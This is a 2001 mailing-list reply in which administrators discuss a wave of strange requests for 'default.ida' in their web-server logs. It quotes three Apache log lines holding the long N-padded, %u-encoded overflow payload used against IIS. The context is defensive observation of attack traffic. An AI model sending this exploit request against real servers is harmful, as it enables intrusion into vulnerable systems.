On Thu, Jul 19, 2001 at 05:28:52PM -0400, Dan Drake wrote: > On Thu, Jul 19, 2001 at 11:23:27PM +0200, Thomas Eibner wrote: > > On Thu, Jul 19, 2001 at 09:16:42PM +0000, kblack at isd.net wrote: > > > Is anybody else running a firewall > > > (and blocking port 80) > > > noticing an unusual number of attacks today? > > Hmmmm. I'm seeing a lot of weird requests for "default.ida" in my logs > (I'm running a web server and not blocking port 80). The accesses look > weird, too...from a bunch of different IPs. I also have "Malformed HTTP > header" (or something like that) in my error log. 211.236.188.150 - - [19/Jul/2001:23:04:43 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333 "-" "-" ip44-137.asiaonline.net - - [19/Jul/2001:23:12:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333 "-" "-" 212.113.168.95 - - [19/Jul/2001:23:32:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333 "-" "-" Like these I take it? > (this may be totally unrelated, I'm not very apache-literate.) I think it is related :) -- Thomas Eibner <http://thomas.eibner.dk/> DnsZone <http://dnszone.org/> mod_pointer <http://stderr.net/mod_pointer>